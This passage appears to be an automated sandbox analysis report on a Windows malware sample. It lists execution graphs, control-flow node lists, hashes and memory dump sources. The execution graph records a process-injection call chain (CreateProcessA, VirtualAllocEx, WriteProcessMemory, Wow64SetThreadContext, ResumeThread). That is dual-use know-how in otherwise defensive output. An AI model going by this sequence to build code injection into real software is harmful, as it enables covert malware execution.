                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:16.7%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:32.8%
                                                                                                                                                                                                                  Total number of Nodes:67
                                                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                                                  execution_graph 24091 513a110 24092 513a158 DuplicateHandle 24091->24092 24093 513a1a5 24092->24093 24094 5139f78 24095 5139fcd CreateFileA 24094->24095 24097 513a08b 24095->24097 24098 13c3f71 24099 13c3f7b 24098->24099 24103 513a338 24099->24103 24107 513a348 24099->24107 24100 13c4025 24105 513a348 24103->24105 24104 513a362 24104->24100 24105->24104 24111 513a3b9 24105->24111 24108 513a35b 24107->24108 24109 513a362 24107->24109 24108->24109 24110 513a3b9 12 API calls 24108->24110 24109->24100 24110->24109 24112 513a3d5 24111->24112 24113 513a3e5 24112->24113 24117 513b7e3 24112->24117 24132 513b7f0 24112->24132 24113->24104 24114 513a411 24114->24104 24118 513b7ea 24117->24118 24119 513be9f 24118->24119 24124 513b127 WriteProcessMemory 24118->24124 24125 513b128 WriteProcessMemory 24118->24125 24130 513af90 Wow64SetThreadContext 24118->24130 24131 513af88 Wow64SetThreadContext 24118->24131 24147 513b2d0 24118->24147 24151 513b2c4 24118->24151 24155 513b710 24118->24155 24159 513b708 24118->24159 24163 513b068 24118->24163 24167 513b060 24118->24167 24171 513aee0 24118->24171 24175 513aed8 24118->24175 24119->24114 24124->24118 24125->24118 24130->24118 24131->24118 24134 513b811 24132->24134 24133 513be9f 24133->24114 24134->24133 24135 513b060 VirtualAllocEx 24134->24135 24136 513b068 VirtualAllocEx 24134->24136 24137 513b710 ReadProcessMemory 24134->24137 24138 513b708 ReadProcessMemory 24134->24138 24139 513b127 WriteProcessMemory 24134->24139 24140 513b128 WriteProcessMemory 24134->24140 24141 513aee0 ResumeThread 24134->24141 24142 513aed8 ResumeThread 24134->24142 24143 513b2d0 CreateProcessA 24134->24143 24144 513b2c4 CreateProcessA 24134->24144 24145 513af90 Wow64SetThreadContext 24134->24145 24146 513af88 Wow64SetThreadContext 24134->24146 24135->24134 24136->24134 24137->24134 24138->24134 24139->24134 24140->24134 24141->24134 24142->24134 24143->24134 24144->24134 24145->24134 24146->24134 24148 513b359 24147->24148 24148->24148 24149 513b4be CreateProcessA 24148->24149 24150 513b51b 24149->24150 24152 513b2c7 CreateProcessA 24151->24152 24154 513b51b 24152->24154 24156 513b75b ReadProcessMemory 24155->24156 24158 513b79f 24156->24158 24158->24118 24160 513b710 ReadProcessMemory 24159->24160 24162 513b79f 24160->24162 24162->24118 24164 513b0a8 VirtualAllocEx 24163->24164 24166 513b0e5 24164->24166 24166->24118 24168 513b063 VirtualAllocEx 24167->24168 24170 513b0e5 24168->24170 24170->24118 24172 513af20 ResumeThread 24171->24172 24174 513af51 24172->24174 24174->24118 24176 513aee0 ResumeThread 24175->24176 24178 513af51 24176->24178 24178->24118

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 013C71C0 Relevance: 16.1, Strings: 12, Instructions: 1110COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ,hq$4$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-55242283
                                                                                                                                                                                                                  • Opcode ID: 4ac8db3f71349c646edf8284fc686478170858e822f771fc4c3a06821a259f95
                                                                                                                                                                                                                  • Instruction ID: 63a7c1f4245c492af41909dc7eea87b2558ec5cff6fc63791ddef176050b4aa4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac8db3f71349c646edf8284fc686478170858e822f771fc4c3a06821a259f95
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFB21934A00218DFDB14DFA8C894BADBBB6FF48704F158599E909AB3A5DB709D81CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C74F7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ,hq$4$$dq$$dq$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-967947350
                                                                                                                                                                                                                  • Opcode ID: 0c25acbda487ff2dc7f02a688d63a03b9eba74213c67902f95f08138dba2fa87
                                                                                                                                                                                                                  • Instruction ID: 9fc9fca30a6e8f17775d911e492ece1aabaa28aff57d410d059686d3c74dceab
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c25acbda487ff2dc7f02a688d63a03b9eba74213c67902f95f08138dba2fa87
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B522FC34A00219DFDB24DFA8C994BADB7B6FF48704F148199DA09AB3A5DB709D81CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 05137358 Relevance: 3.3, Strings: 2, Instructions: 835COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1132 5137358-513736e 1133 5137370-5137387 1132->1133 1134 5137389-5137395 1132->1134 1136 51373af-51373ce 1133->1136 1135 5137397-51373ac 1134->1135 1134->1136 1135->1136 1138 51373d0-51373e0 1136->1138 1139 5137417-513741b 1136->1139 1141 51373e2 1138->1141 1142 51373e8-51373ee 1138->1142 1143 513743d-5137443 1139->1143 1144 513741d-5137421 1139->1144 1141->1139 1147 51373e4-51373e6 1141->1147 1142->1139 1145 5137445-5137449 1143->1145 1146 513744b-5137451 1143->1146 1144->1143 1148 5137423-513743b 1144->1148 1145->1146 1149 5137454-51374ac 1145->1149 1147->1139 1147->1142 1148->1143 1151 51373f0-5137400 1148->1151 1157 51374b2-51374bf 1149->1157 1158 513752e-5137587 1149->1158 1151->1139 1153 5137402-5137414 1151->1153 1153->1139 1161 51374c1-51374cf call 5136ef0 1157->1161 1162 51374d6-51374da 1157->1162 1173 5137648-5137680 1158->1173 1174 513758d-5137593 1158->1174 1166 51374d1-51374d4 1161->1166 1163 5137502 1162->1163 1164 51374dc-5137500 1162->1164 1168 513750b-513752b 1163->1168 1164->1163 1164->1168 1166->1168 1181 513761b-5137641 1173->1181 1191 5137682-51376a9 1173->1191 1175 5137595-5137598 1174->1175 1176 51375bd-51375ce 1174->1176 1177 5137613 1175->1177 1178 513759a-51375bc 1175->1178 1182 51375d0 1176->1182 1183 51375d6-51375da 1176->1183 1177->1181 1181->1173 1185 51375e2-5137612 1182->1185 1186 51375d2-51375d4 1182->1186 1183->1185 1186->1183 1186->1185 1194 51376d3-5137721 1191->1194 1195 51376ab-51376d2 1191->1195 1200 5137723-513772c call 5137358 1194->1200 1201 5137731-5137735 1194->1201 1200->1201 1202 5137737-5137746 1201->1202 1203 513774b-513775c 1201->1203 1205 5137ae0-5137ae7 1202->1205 1206 5137762-5137777 1203->1206 1207 5137c5a-5137c7a 1203->1207 1208 5137783-5137796 1206->1208 1209 5137779-513777e 1206->1209 1214 5137c93-5137cde 1207->1214 1215 5137c7c-5137c80 1207->1215 1210 5137ae8-5137b06 1208->1210 1211 513779c-51377a8 1208->1211 1209->1205 1223 5137b0d-5137b2b 1210->1223 1211->1207 1213 51377ae-51377e5 1211->1213 1216 51377f1-51377f5 1213->1216 1217 51377e7-51377ec 1213->1217 1245 5137ce0-5137cec 1214->1245 1246 5137ced-5137cf2 1214->1246 1219 5137c82-5137c8d 1215->1219 1220 5137c90-5137c92 1215->1220 1222 51377fb-5137807 1216->1222 1216->1223 1217->1205 1219->1220 1222->1207 1225 513780d-5137844 1222->1225 1232 5137b32-5137b50 1223->1232 1229 5137850-5137854 1225->1229 1230 5137846-513784b 1225->1230 1229->1232 1233 513785a-5137866 1229->1233 1230->1205 1240 5137b57-5137b75 1232->1240 1233->1207 1236 513786c-51378a3 1233->1236 1237 51378a5-51378aa 1236->1237 1238 51378af-51378b3 1236->1238 1237->1205 1238->1240 1241 51378b9-51378c5 1238->1241 1256 5137b7c-5137b9a 1240->1256 1241->1207 1244 51378cb-5137902 1241->1244 1249 5137904-5137909 1244->1249 1250 513790e-5137912 1244->1250 1251 5137d30-5137d34 1246->1251 1252 5137cf4-5137cf7 1246->1252 1249->1205 1255 5137918-5137924 1250->1255 1250->1256 1253 5137d25-5137d2e 1252->1253 1253->1251 1260 5137cf9-5137d0d 1253->1260 1255->1207 1259 513792a-5137961 1255->1259 1266 5137ba1-5137bbf 1256->1266 1261 5137963-5137968 1259->1261 1262 513796d-5137971 1259->1262 1268 5137d24 1260->1268 1269 5137d0f-5137d23 call 5136118 1260->1269 1261->1205 1262->1266 1267 5137977-5137983 1262->1267 1278 5137bc6-5137be4 1266->1278 1267->1207 1270 5137989-51379c0 1267->1270 1268->1253 1274 51379c2-51379c7 1270->1274 1275 51379cc-51379d0 1270->1275 1274->1205 1275->1278 1279 51379d6-51379e2 1275->1279 1286 5137beb-5137c09 1278->1286 1279->1207 1281 51379e8-5137a1f 1279->1281 1282 5137a21-5137a26 1281->1282 1283 5137a2b-5137a2f 1281->1283 1282->1205 1285 5137a35-5137a41 1283->1285 1283->1286 1285->1207 1288 5137a47-5137a7e 1285->1288 1295 5137c10-5137c2e 1286->1295 1290 5137a80-5137a85 1288->1290 1291 5137a87-5137a8b 1288->1291 1290->1205 1294 5137a91-5137a9a 1291->1294 1291->1295 1294->1207 1297 5137aa0-5137ad5 1294->1297 1298 5137c35-5137c53 1295->1298 1297->1298 1299 5137adb 1297->1299 1298->1207 1299->1205
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$(hq
                                                                                                                                                                                                                  • API String ID: 0-2483692461
                                                                                                                                                                                                                  • Opcode ID: 4f507962c5cff803195d42ed805a2f9aa8b133607209e4494b2725a0b27e4ef7
                                                                                                                                                                                                                  • Instruction ID: 9433c6c705aeb02174e06bdf79d2048f65c16d1fb425c8e540ac73ea0c5600cd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f507962c5cff803195d42ed805a2f9aa8b133607209e4494b2725a0b27e4ef7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA62ADB0B006158FCB15DF69C4A5A6EFBF2FF88300F248929D55AD7781DB34AA05CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CAC68 Relevance: 3.1, Strings: 2, Instructions: 649COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1308 13cac68-13cac82 1309 13cac8e-13cac9a 1308->1309 1310 13cac84-13cac8b 1308->1310 1312 13cac9c-13caca9 1309->1312 1313 13cacf6-13cacf9 1309->1313 1320 13cacaf-13cacdf 1312->1320 1321 13caec7-13caeff 1312->1321 1314 13cad0c-13cad0f 1313->1314 1315 13cacfb-13cacfd 1313->1315 1317 13cad35-13cad38 1314->1317 1318 13cad11-13cad2f 1314->1318 1319 13cad05 1315->1319 1322 13caebd-13caec4 1317->1322 1323 13cad3e-13cad44 1317->1323 1318->1317 1327 13caf06-13caf51 1318->1327 1319->1314 1349 13cacec-13cacef 1320->1349 1350 13cace1-13cacea 1320->1350 1321->1327 1323->1322 1325 13cad4a-13cad53 1323->1325 1330 13cad8b-13cad91 1325->1330 1331 13cad55-13cad64 1325->1331 1358 13caf8a-13caf8c 1327->1358 1359 13caf53-13caf60 1327->1359 1335 13cae9c-13caea2 1330->1335 1336 13cad97-13cada0 1330->1336 1331->1330 1342 13cad66-13cad7f 1331->1342 1335->1322 1339 13caea4-13caeb4 1335->1339 1336->1335 1347 13cada6-13cadb2 1336->1347 1339->1322 1352 13caeb6-13caebb 1339->1352 1342->1330 1353 13cad81-13cad84 1342->1353 1356 13cadb8-13cade0 1347->1356 1357 13cae50-13cae94 1347->1357 1349->1313 1350->1313 1352->1322 1353->1330 1356->1357 1371 13cade2-13cae1f 1356->1371 1357->1335 1360 13cb3d7-13cb3de 1358->1360 1359->1358 1364 13caf62-13caf88 1359->1364 1364->1358 1376 13caf91-13cafc5 1364->1376 1371->1357 1382 13cae21-13cae4e 1371->1382 1384 13cb068-13cb077 1376->1384 1385 13cafcb-13cafd4 1376->1385 1382->1335 1393 13cb079-13cb08f 1384->1393 1394 13cb0b6 1384->1394 1386 13cb3df-13cb401 1385->1386 1387 13cafda-13cafed 1385->1387 1396 13cafef-13cb008 1387->1396 1397 13cb056-13cb062 1387->1397 1403 13cb0af-13cb0b4 1393->1403 1404 13cb091-13cb0ad 1393->1404 1395 13cb0b8-13cb0bd 1394->1395 1398 13cb0bf-13cb0e0 1395->1398 1399 13cb100-13cb11c 1395->1399 1396->1397 1414 13cb00a-13cb018 1396->1414 1397->1384 1397->1385 1398->1399 1420 13cb0e2 1398->1420 1408 13cb1e4-13cb1ed 1399->1408 1409 13cb122-13cb12b 1399->1409 1403->1395 1404->1395 1415 13cb3d5 1408->1415 1416 13cb1f3 1408->1416 1409->1386 1412 13cb131-13cb14e 1409->1412 1440 13cb154-13cb16a 1412->1440 1441 13cb1d2-13cb1de 1412->1441 1414->1397 1428 13cb01a-13cb01e 1414->1428 1415->1360 1417 13cb25e-13cb26c call 13c8200 1416->1417 1418 13cb1fa-13cb1fc 1416->1418 1419 13cb201-13cb20f call 13c8200 1416->1419 1431 13cb26e-13cb274 1417->1431 1432 13cb284-13cb287 1417->1432 1418->1360 1429 13cb227-13cb22a 1419->1429 1430 13cb211-13cb217 1419->1430 1424 13cb0e5-13cb0fe 1420->1424 1424->1399 1428->1386 1435 13cb024-13cb03d 1428->1435 1442 13cb22c-13cb22e 1429->1442 1443 13cb233-13cb241 call 13c8200 1429->1443 1436 13cb219 1430->1436 1437 13cb21b-13cb21d 1430->1437 1438 13cb278-13cb27a 1431->1438 1439 13cb276 1431->1439 1444 13cb28d-13cb29b call 13c8200 1432->1444 1445 13cb318-13cb329 call 13c8200 1432->1445 1435->1397 1461 13cb03f-13cb053 call 13c7030 1435->1461 1436->1429 1437->1429 1438->1432 1439->1432 1440->1441 1473 13cb16c-13cb17a 1440->1473 1441->1408 1441->1409 1442->1360 1457 13cb259 1443->1457 1458 13cb243-13cb249 1443->1458 1459 13cb29d-13cb2a3 1444->1459 1460 13cb2b3-13cb2c6 call 13c8200 1444->1460 1455 13cb32b-13cb331 1445->1455 1456 13cb341-13cb344 1445->1456 1463 13cb335-13cb337 1455->1463 1464 13cb333 1455->1464 1456->1415 1466 13cb34a-13cb35b call 13c8200 1456->1466 1457->1360 1467 13cb24d-13cb24f 1458->1467 1468 13cb24b 1458->1468 1469 13cb2a5 1459->1469 1470 13cb2a7-13cb2a9 1459->1470 1476 13cb2de-13cb2eb 1460->1476 1477 13cb2c8-13cb2ce 1460->1477 1461->1397 1463->1456 1464->1456 1482 13cb35d-13cb363 1466->1482 1483 13cb373-13cb383 call 13c8200 1466->1483 1467->1457 1468->1457 1469->1460 1470->1460 1473->1441 1487 13cb17c-13cb180 1473->1487 1476->1445 1491 13cb2ed-13cb2fb call 13c8200 1476->1491 1479 13cb2d0 1477->1479 1480 13cb2d2-13cb2d4 1477->1480 1479->1476 1480->1476 1488 13cb365 1482->1488 1489 13cb367-13cb369 1482->1489 1493 13cb39b-13cb3a8 1483->1493 1494 13cb385-13cb38b 1483->1494 1487->1386 1492 13cb186-13cb1af 1487->1492 1488->1483 1489->1483 1501 13cb2fd-13cb303 1491->1501 1502 13cb313 1491->1502 1492->1441 1510 13cb1b1-13cb1cf call 13c7030 1492->1510 1493->1415 1504 13cb3aa-13cb3bb call 13c8200 1493->1504 1497 13cb38d 1494->1497 1498 13cb38f-13cb391 1494->1498 1497->1493 1498->1493 1505 13cb305 1501->1505 1506 13cb307-13cb309 1501->1506 1502->1360 1511 13cb3bd-13cb3c3 1504->1511 1512 13cb3d3 1504->1512 1505->1502 1506->1502 1510->1441 1513 13cb3c5 1511->1513 1514 13cb3c7-13cb3c9 1511->1514 1512->1360 1513->1512 1514->1512
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Pldq$$dq
                                                                                                                                                                                                                  • API String ID: 0-19887615
                                                                                                                                                                                                                  • Opcode ID: 007bd2b557e12abeaa02b2d6076fd49d47d06177a583a1b8f26a60314abc17d2
                                                                                                                                                                                                                  • Instruction ID: 2d00e304d1c056298a423e369dbde904a03d01cd638b0227f5dbd6743c80dee4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 007bd2b557e12abeaa02b2d6076fd49d47d06177a583a1b8f26a60314abc17d2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25426A70700218CFDB15DF28C489A6EBBF6BF88B45B1584A9E906CB3A5DB31EC41CB51
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC508 Relevance: 1.7, Strings: 1, Instructions: 472COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRdq
                                                                                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                                                                                  • Opcode ID: 346fd077abfe7abb539cae1844384e116fd2e11f152711f5c18c3d1abc24c986
                                                                                                                                                                                                                  • Instruction ID: 6ca34207b226966cc64e9fd323abf166982c3c1414ddd980b9f97ee4edfcc424
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 346fd077abfe7abb539cae1844384e116fd2e11f152711f5c18c3d1abc24c986
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD129D35E112698FDB14DF6AD890AAEB7F2FF88305F158529E405EB354DB309942CFA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC4F8 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRdq
                                                                                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                                                                                  • Opcode ID: 5d1f935aae718b63e293e83ce3738a725530b0bebe165ba88f7d4eeb13eaebe2
                                                                                                                                                                                                                  • Instruction ID: 0e4ef781bd97c0904655bb9dc8f44fca51053d5169e4500a64c61e54cf088e46
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d1f935aae718b63e293e83ce3738a725530b0bebe165ba88f7d4eeb13eaebe2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DB18F35A012299FDB14DF7AD890AADB7B3BFC8305F15C529E405EB394DB346902CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC542 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRdq
                                                                                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                                                                                  • Opcode ID: 95723cbfcb3f72968f32b9d98371fc343f9d5b70f0b93849866cc89cd135cbc4
                                                                                                                                                                                                                  • Instruction ID: 0566f8dac048b1d839a2dfbc0a49f143834134e47d9ce934cf32f994b8e8b581
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95723cbfcb3f72968f32b9d98371fc343f9d5b70f0b93849866cc89cd135cbc4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7A17F35A012299FDB14DF7AD890AADB7B3FFC8305F158529E405EB354DB34A902CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B7E3 Relevance: .5, Instructions: 532COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: f3831bec4224bdd84e628240f5baa5a2d54cb3094e597872e0789d9a5ca8a7f5
                                                                                                                                                                                                                  • Instruction ID: 58755feff602f98f22251831dc85dea8d921bdeeeccd5c5fc7bae0ca736c1b3d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3831bec4224bdd84e628240f5baa5a2d54cb3094e597872e0789d9a5ca8a7f5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16127431B002159FC718EF69C861B6EB7A6FFC8740F248558E80AAB395DF35DD428790
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B7F0 Relevance: .5, Instructions: 523COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 27814cb29169b286d1397f42a39c56b0bebb54d14c7890a8253a32d59bb24174
                                                                                                                                                                                                                  • Instruction ID: 8ded6a90756acd87ef316f3b03fc1e304ee7b0fbaadb593e98a43431bba1d4dc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27814cb29169b286d1397f42a39c56b0bebb54d14c7890a8253a32d59bb24174
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86127470B002159FD718EF69C861B6EB7A6FFC8700F258568E80AAB395DF35DD428790
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DED318 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: c796b5ad9533a300e5b5dd492806270b6403aa5ad98232e163a54a1e12521f07
                                                                                                                                                                                                                  • Instruction ID: 0aaed9edd6cb72ee56e36265878c23801fc6a2c21d191d83e69efb56e6a7609c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c796b5ad9533a300e5b5dd492806270b6403aa5ad98232e163a54a1e12521f07
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0915076B102258FD714EB6DD854A5EB7E3AFC8711F1A8179E409DB3A9DE30AC01CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEB479 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b4d906db3ccb7980d3ca155f99e5de79c57ce1df72550ac86a60dd2f73f0f8a1
                                                                                                                                                                                                                  • Instruction ID: 3d41106714d304d178dcdd5b1430bb65fb9b22208437782d94ae6054a43e2d5b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4d906db3ccb7980d3ca155f99e5de79c57ce1df72550ac86a60dd2f73f0f8a1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA717E30B00284DFD704FB2AD4987AB77E3EB89324F28846AD505DB7A5DB746D81CB61
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEEA90 Relevance: 5.3, Strings: 4, Instructions: 308COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
